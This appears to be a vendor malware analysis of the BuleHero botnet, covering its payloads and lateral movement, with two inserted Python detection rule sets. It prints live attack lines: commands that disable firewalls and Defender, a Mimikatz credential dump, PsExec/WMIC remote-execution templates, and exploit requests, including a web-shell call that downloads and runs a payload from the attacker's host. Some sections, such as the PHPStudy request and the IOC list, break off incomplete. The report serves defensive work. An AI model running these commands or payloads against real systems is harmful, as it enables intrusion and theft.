Ever since the 2017 outbreak of WannaCry, NotPetya, and BadRabbit ransomware, as well as the WannaMine cryptocurrency campaign, there has been a steep increase in malware that uses the now infamous ShadowBroker’s leaked exploits—EternalBlue, EternalChampion, EternalRomance, and EternalSynergy—for lateral propagation.
Alongside these exploits, many other modules such as MimiKatz, PsExec, and WMIC have been observed as a means to propagate malware on networks. Traditional attack vectors like brute force attacks are also playing a crucial role in infecting other hosts to spread malware. The ThreatLabZ team is keeping a close eye on these and other new lateral movement techniques and the malware they are attempting to propagate. While doing research on this topic, we landed on a botnet called “BuleHero,” which has a number of lateral movement techniques embedded in it. In this report, we will provide a brief overview of the malware dropped by the BuleHero botnet, while focusing on the lateral movement aspect of the BuleHero botnet.
BuleHero is named after the domain “bulehero[.]in,” which was found in the initial botnet binary. This botnet leverages a variety of web exploits to enable it to intrude on unpatched web servers. It also contains many other exploits to help it spread across the network. It not only tries to spread on internal networks but also on the internet. The Zscaler Cloud Sandbox service detected this malware.
URL: aa[.]0xbdairolkoie[.]space/xs.exe
MD5: F864506F9797592321CF4C6A0BB5F199
Let's take a deeper look into the different modules of this botnet.
The “xs.exe” is an installer file that downloads “swpuhostd.exe” from the URL “aa[.]0xbdairolkoie[.]space/swpuhostd.exe” and stores it at “C:\WebKitSdk\2.25.16\swpuhostd.exe” location.
It then fetches the configuration file (cfg.ini) from one of the nine hardcoded URLs.
hxxp://xs[.]0x0x0x0x0[.]club:63145/cfg[.]ini
hxxp://qb[.]1c1c1c1c[.]best:63145/cfg[.]ini
hxxp://ce[.]1c1c1c1c[.]club:63145/cfg[.]ini
hxxp://jz[.]1c1c1c1c[.]xyz:63145/cfg[.]ini
hxxp://eq[.]s1s1s1s1s[.]asia:63145/cfg[.]ini
hxxp://rs[.]s1s1s1s1s[.]fun:63145/cfg[.]ini
hxxp://ik[.]s1s1s1s1s[.]host:63145/cfg[.]ini
hxxp://cu[.]s1s1s1s1s[.]pw:63145/cfg[.]ini
hxxp://ff[.]s1s1s1s1s[.]site:63145/cfg[.]ini
Fig 1: BuleHero configuration
The botnet looks for new updates from the IPs 172.104.91.191 and 139.162.2.123. The URL “hxxp://fk[.]0xbdairolkoie[.]space/download.exe” is part of the payload or shellcode used to compromise other machines on the network. Upon successful exploitation, the file downloaded from this URL is executed on the newly infected system, which, in turn, tries to spread from that machine. The botnet contains an embedded miner file that connects to the “mi.oops[.]best:80, mx.oops[.]best:443” mining pool.
On a successful run, it creates copies of itself at the following locations on the infected system.
C:\\Windows\\uhctnicb\\mftzlgg.exe
C:\\Windows\\Fonts\\mftzlgg.exe
%TEMP%\\388954562\\TemporaryFile
To be persistent on the system, the malware does the following:
Creates a service with name “bnttpgkqt” and with BinaryPathName as "C:\\Windows\\uhctnicb\\mftzlgg.exe"
Creates a task with the name “bicfnzlke,” which triggers the main malware file every minute with full permissions:
cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"bicfnzlke\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\mftzlgg.exe\"
Makes a run entry with the name “bnttpgkqt” for “C:\Windows\uhctnicb\mftzlgg.exe” at “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”
It also tries to bypass the security measures on the system, like firewalls. The botnet first deletes all the firewall rules and later it adds a few in order to enable access to the NetBIOS and SMB protocol.
Below are the commands found in the binary that manipulate the firewall rules:
netsh ipsec static delete all
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
cmd /c net stop SharedAccess
cmd /c netsh firewall set opmode mode=disable
cmd /c netsh Advfirewall set allprofiles state off
cmd /c net stop MpsSvc
cmd /c net stop WinDefend
cmd /c net stop wuauserv
cmd /c sc config MpsSvc start= disabled
cmd /c sc config SharedAccess start= disabled
cmd /c sc config WinDefend start= disabled
cmd /c sc config wuauserv start= disabled
The malware also changes the file associations in HKEY_CLASSES_ROOT for files with the extensions “.bat, .cmd, .js, .vbs, .vbe, .reg, .ps1” to txtfile, so that these script types open as plain text instead of executing.
The botnet contains many embedded files in it. It drops those files in the following directory structure at “C:\Windows\ziheeghmq”:
Fig 2: Drop location
Corporate – Mimikatz password grabbing tool
qvrmuzmcf – Port scanning tools
UnattendGC – Eternal Blue attack kit
It drops XMRig miner at “%TEMP%\\cnaqzbggt\\svtink.exe” and it also drops a Gh0st RAT at “%systemroot%\\vqbbqs.exe.”
Payloads
XMRig Miner:
The XMRig miner uses a configuration file “%TEMP%\\cnaqzbggt\\config.json” dropped by the botnet.
Fig 3: XMRig miner configuration file
It is built from the open-source XMRig miner and uses the “mi.oops[.]best:80” and “mx.oops[.]best:443” mining pool.
Fig 4: XMRig miner network communication
Gh0st RAT:
Gh0st RAT is an open-source RAT. The source code is public and it has been used by multiple groups. First, it creates a service of itself with the name “EaepRegSvc.” It creates a mutex of the name “ox.mygoodluck.best:12000:EaepRegSvc." It makes a DNS request for ox.mygoodluck[.]best to get the IP address, which is 185.147.34[.]106. This RAT communicates on 185.147.34[.]106:12000 to receive commands and send the data with encryption.
Fig 5: Gh0st RAT CNC traffic
Lateral movement
To this point, we have provided a few details about the embedded malware payloads dropped by the BuleHero botnet. Now we will shift our focus to the lateral movement modules, which are embedded in this botnet. Below are the modules that are used to perform lateral spreading.
Port Scanning
In order to spread across a network, it is important for malware to scan the network to identify the exposed and vulnerable machines connected to the network. To achieve this scan, “Swpuhostd.exe” drops a port scanning tool at the location “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\vqfevffuz.exe.”
The botnet first fetches the public IP address of the infected system by accessing “hxxp://v4.ipv6-test[.]com/api/myip.php,” from which it generates the IP subnet of the public network of the infected system and stores it in “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\ip.txt.” It also adds intranet subnets and public subnets that are randomly generated by the botnet.
Fig 6: IP subnets in “ip.txt”
After creating the IP ranges, the botnet starts the port scanning module to scan IP addresses specified in the ip.txt with a given port. The botnet also generates ports that are given as input to the below command. It generates ports that belong to web applications. It also contains a few hard-coded ports like 135 (DCE/RPC), 139 (NetBIOS), 445 (SMB), and 3389 (RDP).
Scanning command structure:
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p
Examples:
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8020
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8040
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 7001
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 7070
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8050
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8282
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8082
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8085
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8087
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8088
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8983
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8060
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8080
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 9090
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8001
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8083
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8888
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8181
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 135
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 445
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 80
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 88
In this version of BuleHero botnet, we also observed scanning for an RDP service. The botnet starts this scanning on a hard-coded IP subnet 222.186.55.1-222.186.155.255. It also scans port 80 on this subnet. It saves the IP addresses that have ports 80 and 3389 open to Scantest.txt. The port scanning happens sequentially and its results are accumulated into Result.txt. The results of the scanning process are the active IP addresses that have those ports opened up.
cmd /c vqfevffuz.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ Scantest.txt
Interestingly, the botnet deletes the generated “Scantest.txt” file without using it. This suggests that the BuleHero botnet authors are trying to integrate RDP scanning, possibly enabling future exploits for RDP such as Bluekeep or attacking the RDP service with traditional brute-force attacks.
Fig 7: RDP scanning
Lateral movement components
Mimikatz
The botnet drops the “Mimikatz” tool at “C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe” for dumping passwords from infected hosts. These passwords are used to log into systems connected to the botnet.
cmd /c C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\\Windows\\ziheeghmq\\Corporate\\log.txt
Fig 8: Running Mimikatz to extract credentials
These obtained passwords are then used by PsExec and WMIC to spread the malware onto the network.
PsExec and WMIC
The botnet drops the PsExec tool at the location “C:\\Windows\\ziheeghmq\\Corporate\\scvhost.exe” and it uses the WMIC tool, which is already present on Windows systems. The botnet first launches PsExec to execute the malware on a remote machine, but if it fails it then uses WMIC to execute the malware.
Along with the credentials obtained from Mimikatz, the botnet contains a dictionary of usernames and passwords to carry out a brute-force attack on a remote machine.
PsExec command:
scvhost.exe /accepteula \\[remote_machine] -d -c -u -p “cmd.exe /c [command]”
Fig 9: Remote execution using PsExec
WMIC command:
wmic.exe /node:[targetMachine] /user:[userName] /password:[password] process call create “cmd.exe /c [command]”
Fig 10: Remote execution using WMIC
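As an added detection example (not code from the Zscaler report), the following Python rules flag the host-side command lines described above, both the persistence and firewall tampering seen earlier and the Mimikatz, PsExec and WMIC usage, across constructed process-creation events. The event field names (host, image, cmdline), the host names, and the sample credentials and IPs are assumptions made for illustration.

```python
import re

# Constructed process-creation events for illustration; the field names
# (host, image, cmdline) are an assumption, not a specific product's schema.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "netsh.exe", "cmdline": "netsh ipsec static delete all"},
    {"host": "ws01", "image": "netsh.exe", "cmdline": "netsh Advfirewall set allprofiles state off"},
    {"host": "ws01", "image": "sc.exe", "cmdline": "sc config WinDefend start= disabled"},
    {"host": "ws01", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 1 /tn "bicfnzlke" /ru system /tr "cmd /c C:\\Windows\\Fonts\\mftzlgg.exe"'},
    {"host": "ws01", "image": "vfshost.exe",
     "cmdline": "vfshost.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"host": "ws01", "image": "scvhost.exe",
     "cmdline": "scvhost.exe /accepteula \\\\10.0.0.7 -d -c -u admin -p Passw0rd cmd.exe /c C:\\WebKit\\2.250.20\\fxxkmylife0xa.exe"},
    {"host": "ws01", "image": "wmic.exe",
     "cmdline": 'wmic.exe /node:10.0.0.8 /user:admin /password:Passw0rd process call create "cmd.exe /c download.exe"'},
    # Benign look-alikes that must not fire.
    {"host": "ws02", "image": "netsh.exe", "cmdline": "netsh advfirewall show allprofiles"},
    {"host": "ws02", "image": "schtasks.exe", "cmdline": 'schtasks /create /sc daily /tn Backup /tr "C:\\Tools\\backup.exe"'},
]

# (rule name, tactic, case-insensitive regex over the full command line).
# Matching on arguments rather than image names matters here: BuleHero renames
# Mimikatz to vfshost.exe and PsExec to scvhost.exe.
RULES = [
    ("ipsec_policy_wipe", "defense-evasion", r"netsh\s+ipsec\s+static\s+delete\s+all"),
    ("firewall_disabled", "defense-evasion",
     r"netsh\s+(advfirewall\s+set\s+allprofiles\s+state\s+off|firewall\s+set\s+opmode\s+mode=disable)"),
    ("security_service_disabled", "defense-evasion",
     r"(net\s+stop|sc\s+config)\s+(MpsSvc|WinDefend|SharedAccess|wuauserv)\b"),
    ("minute_task_from_windows_dir", "persistence",
     r'schtasks\s+/create\b.*/sc\s+minute\s+/mo\s+1\b.*/tr\s+"?cmd\s+/c\s+C:\\Windows\\'),
    ("mimikatz_logonpasswords", "credential-access", r"privilege::debug|sekurlsa::logonpasswords"),
    ("psexec_copy_and_run", "lateral-movement", r"/accepteula\s+\\\\\S+.*\s-c\b"),
    ("wmic_remote_process_create", "lateral-movement",
     r"wmic(\.exe)?\s+/node:\S+.*process\s+call\s+create"),
]

def evaluate(events):
    """Return (host, rule, tactic, cmdline) for every rule that matches an event."""
    hits = []
    for ev in events:
        for name, tactic, pattern in RULES:
            if re.search(pattern, ev["cmdline"], re.IGNORECASE):
                hits.append((ev["host"], name, tactic, ev["cmdline"]))
    return hits

def hosts_with_evasion_and_spread(hits):
    """Hosts that both tampered with defences and attempted remote execution:
    the combination, not any single command, separates this chain from
    routine administration."""
    tactics = {}
    for host, _, tactic, _ in hits:
        tactics.setdefault(host, set()).add(tactic)
    return sorted(h for h, t in tactics.items() if {"defense-evasion", "lateral-movement"} <= t)

if __name__ == "__main__":
    for host, rule, tactic, cmd in evaluate(SAMPLE_EVENTS):
        print(f"{host} {tactic:17} {rule:28} {cmd[:60]}")
    print("chain hosts:", hosts_with_evasion_and_spread(evaluate(SAMPLE_EVENTS)))
```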
SMB Exploitation
The botnet stores a Fuzzbunch-like SMB exploitation toolkit from the ShadowBrokers NSA leak in the directory “C:\\Windows\\ziheeghmq\\UnattendGC.” The toolkit contains the EternalBlue, EternalRomance, and EternalChampion exploits, the DoublePulsar backdoor, and the SMBtouch utility.
Fig 11: SMB exploits package
The botnet reads the scanning result of the port scanner tool after running it against ports 139 and 445, which is present at “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\Result.txt.” The botnet runs the SMBtouch utility to scan for vulnerable hosts.
SMB touch command:
vimpcsvc.exe --InConfig vimpcsvc.xml --TargetIp 106.51.178.148 --TargetPort 445 --NetworkTimeout 60 --Protocol SMB --OutConfig 106.51.178.148.xml
It then launches SMB exploits onto the vulnerable machine with shellcode, which injects the final payload (AppCapture32.dll or AppCapture64.dll) into one of the legitimate processes of the target machine. Below is one such example in which we observed that EternalRomance was being used to exploit the system.
EternalRomance and DoublePulsar command:
cmd /c docmicfg.exe --InConfig docmicfg.xml --TargetIp 106.51.3.141 --TargetPort 445 --NetworkTimeout 30 --Protocol SMB --Target WIN7_SP1 --TargetOsArchitecture x86 --Credentials Anonymous --PipeName samr --ShellcodeFile Shellcode.ini & svschost.exe --InConfig svschost.xml --TargetIp 106.51.3.141 --TargetPort 445 --DllPayload AppCapture32.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
The payload DLL downloads the BuleHero malware from “hxxp://fk.0xbdairolkoie[.]website/download.exe” and stores it at “C:\\WebKit\\2.250.20\\fxxkmylife0xa.exe” before executing it.
Fig 12: Payload after SMB exploitation
Along with the SMB exploits, the botnet contains exploits for well-known web applications. These exploits are fired against web servers obtained from the port scanning result.
Web Application Exploits
Apache Tomcat PUTs vulnerability (CVE-2017-12615)
This vulnerability affects Apache Tomcat 7.0.0 to 7.0.79 on Windows with the HTTP PUT method enabled. The botnet uses it to upload a maliciously crafted JSP file to the server.
Fig 13: Crafting request after uploading FxCodeShell.jsp
Exploit: /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http%3A%2F%2Ffk.0xbdairolkoie.space%2Fdownload.exe
Apache Struts RCE vulnerability (CVE-2017-5638)
This vulnerability affects Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1. Apache Struts is a free and open-source framework used to build Java web applications. This particular vulnerability can be exploited if the attacker sends a crafted request to upload a file to a vulnerable server that uses a Jakarta-based plugin to process the upload request. The attacker can then send malicious code in the "Content-Type" header to execute the command on a vulnerable server.
Fig 14: Crafting request to exploit Apache Struts vulnerability
Exploit: /struts2-rest-showcase/orders.xhtml
Content-Type: %{(#nike='multipart/form-data')... Post.Open "GET","hxxp://fk.0xbdairolkoie[.]website/download.exe",0 >>..
Oracle WebLogic server vulnerability (CVE-2018-2628)
This vulnerability allows an unauthenticated attacker with network access via the T3 protocol to compromise an Oracle WebLogic Server running on port 7001. The affected versions are 10.3.6.0, 12.1.3.0, 12.2.1.2, and 12.2.1.3.
Fig 15: Sending T3 handshaking request
Fig 16: Sending payload to execute on server
WebLogic Deserialization RCE vulnerability (CVE-2019-2725)
Oracle WebLogic Server is prone to a remote command-execution vulnerability due to deserializing input information. Specifically, this issue affects the "wls9_async" and "wls-wsat" components. An attacker can exploit this issue to execute arbitrary commands. The affected versions are 10.3.6.0.0 and 12.1.3.0.0.
Fig 17: Constructing malicious payload request
Exploit: :port/wls-wsat/CoordinatorPortType or :port/_async/AsyncResponseService
Data: payload
Oracle WebLogic Server vulnerability (CVE-2017-10271)
This vulnerability in the Oracle WebLogic Server component of WLS security allows an unauthenticated attacker with network access via the T3 protocol to compromise the server. The affected versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, and 12.2.1.2.0.
Fig 18: Constructing malicious payload request
ThinkPHP v5 Remote Code Execution vulnerability
The reason for this vulnerability is that the underlying layer of the ThinkPHP5 framework does not strictly filter the controller name, which allows an attacker to call sensitive functions inside the ThinkPHP framework through the URL, leading to the download and installation of malware.
It tries to download and execute malware by running PowerShell from "cmd" due to this vulnerability.
Fig 19: ThinkPHP vulnerability to download and execute malware
Using this vulnerability, it also installs hydra.php, a web shell that executes commands.
Fig 20: ThinkPHP vulnerability to install malware by web-shell
It then uses hydra.php to launch PowerShell from "cmd," which downloads and executes the malware.
Fig 21: ThinkPHP vulnerability to download and execute malware by hydra.php
Exploit: GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fk.0xbdairolkoie[.]website/download.exe','C:/WebKit/2.250.20/12.exe');start%20C:/WebKit/2.250.20/12.exe
Drupal Remote Code Execution vulnerability (CVE-2018-7600)
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. It allows an attacker to inject a malicious payload into a form structure to execute arbitrary code.
Fig 22: Construct a request payload to exploit Drupal vulnerability
Exploit: URL: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Payload: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail[#type]=markup&mail[#markup]= “malicious commands”
Apache Solr Remote Code Execution vulnerability (CVE-2019-0193)
This vulnerability exists in the DataImportHandler module, a common module used to import data from databases or other sources. The whole DIH configuration of this module can come from the dataConfig parameter included in an external request. As a DIH configuration can contain scripts, this parameter is a security risk.
An attacker could exploit this vulnerability to cause arbitrary code execution via a malicious request that contains a carefully crafted dataConfig parameter. Affected versions: Apache Solr
PHPStudy backdoor
The BuleHero malware checks whether either of the PHP module paths below exists and, if so, replaces that module with the embedded backdoor, which allows an attacker to execute any command on the server.
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
This module is the same as the one that was being spread by the PhpStudy official site when it was compromised. The purpose of these implanted backdoors was mainly remote code execution.
Fig 24: Drop php_xmlrpc.dll if already exists
Besides backdooring the infected system itself, the malware sends the request below to the scanned IPs so that they download and execute the payload.
Fig 25: Crafting a request with malicious payload
Exploit: URL: /index.php
Accept-Encoding: gzip,deflate
Accept-Charset:
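As an added detection example (not code from the Zscaler report), the following Python rules match the request shapes described for the web application exploits above, the Tomcat PUT of a JSP, the Struts OGNL Content-Type, the WebLogic wls-wsat and _async endpoints, the ThinkPHP hydra.php shell, the Drupal element_parents form trick, and the BuleHero payload host, against constructed HTTP request records. The record fields (method, path, headers, body) and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed HTTP request records (method, path with query, headers, body);
# this shape is an assumption, not a specific WAF or web-server log format.
SAMPLE_REQUESTS = [
    {"method": "PUT", "path": "/FxCodeShell.jsp", "headers": {}, "body": "<% /* constructed */ %>"},
    {"method": "GET", "path": "/FxCodeShell.jsp?os=1&address=http%3A%2F%2Ffk.0xbdairolkoie[.]space%2Fdownload.exe",
     "headers": {}, "body": ""},
    {"method": "POST", "path": "/struts2-rest-showcase/orders.xhtml",
     "headers": {"Content-Type": "%{(#nike='multipart/form-data')...}"}, "body": ""},
    {"method": "POST", "path": "/wls-wsat/CoordinatorPortType", "headers": {"Content-Type": "text/xml"},
     "body": "<soapenv:Envelope><!-- constructed --></soapenv:Envelope>"},
    {"method": "GET", "path": "/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient)"
     ".DownloadFile('http://fk.0xbdairolkoie[.]website/download.exe','C:/WebKit/12.exe')", "headers": {}, "body": ""},
    {"method": "POST", "path": "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail[#type]=markup&mail[#markup]=id"},
    # Benign traffic that must not fire.
    {"method": "GET", "path": "/index.html", "headers": {}, "body": ""},
    {"method": "POST", "path": "/user/register", "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "form_id=user_register_form&name=alice"},
]

def _decoded(req):
    """URL-decoded, lower-cased path+query so %23 and case changes do not evade matching."""
    return unquote(req["path"]).lower()

# (rule name, predicate over one request record).
RULES = [
    ("tomcat_put_jsp_cve_2017_12615",
     lambda r: r["method"] == "PUT" and ".jsp" in _decoded(r)),
    ("fxcodeshell_download_call",
     lambda r: "fxcodeshell.jsp" in _decoded(r) and "address=http" in _decoded(r)),
    ("struts_ognl_content_type_cve_2017_5638",
     lambda r: "%{" in r["headers"].get("Content-Type", "")),
    ("weblogic_wls_wsat_async_cve_2019_2725",
     lambda r: r["method"] == "POST"
     and re.search(r"/(wls-wsat/coordinatorporttype|_async/asyncresponseservice)\b", _decoded(r)) is not None),
    ("thinkphp_hydra_shell_xcmd",
     lambda r: "hydra.php" in _decoded(r) and "xcmd=" in _decoded(r)),
    ("drupal_form_api_rce_cve_2018_7600",
     lambda r: "/user/register" in _decoded(r)
     and "element_parents=account/mail/#value" in _decoded(r)
     and "#post_render" in unquote(r.get("body", ""))),
    ("bulehero_payload_host",
     lambda r: "0xbdairolkoie" in _decoded(r) or "0xbdairolkoie" in r.get("body", "")),
]

def evaluate(requests):
    """Return (rule, method, path) for each rule that fires on a request."""
    return [(name, r["method"], r["path"]) for r in requests for name, pred in RULES if pred(r)]

def targeted_exploits(hits):
    """Distinct exploit families seen, so a defender can map them to the patches above."""
    return sorted({name for name, _, _ in hits if name != "bulehero_payload_host"})

if __name__ == "__main__":
    for rule, method, path in evaluate(SAMPLE_REQUESTS):
        print(f"{rule:40} {method:4} {path[:50]}")
    print("exploits seen:", targeted_exploits(evaluate(SAMPLE_REQUESTS)))
```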
Conclusion
Inclusion of lateral propagation in any type of malware makes it more dangerous, as it can compromise an entire network. By including several exploits and methods for spreading across the network, the malware has multiple options, which makes it more robust. We have been observing an increase in such malware since 2017. We advise users to keep systems updated with the latest operating system updates and security patches and to harden servers and endpoints. It's also important to keep security software updated regularly to defend against such malware. Zscaler provides a layered security offering which protects against new and evolving malware, like the BuleHero botnet. The inclusion of Cloud IPS in the Zscaler platform protects customers against the exploits used in lateral propagation.
Zscaler protection
Fig 26: Zscaler Sandbox report
IOCs: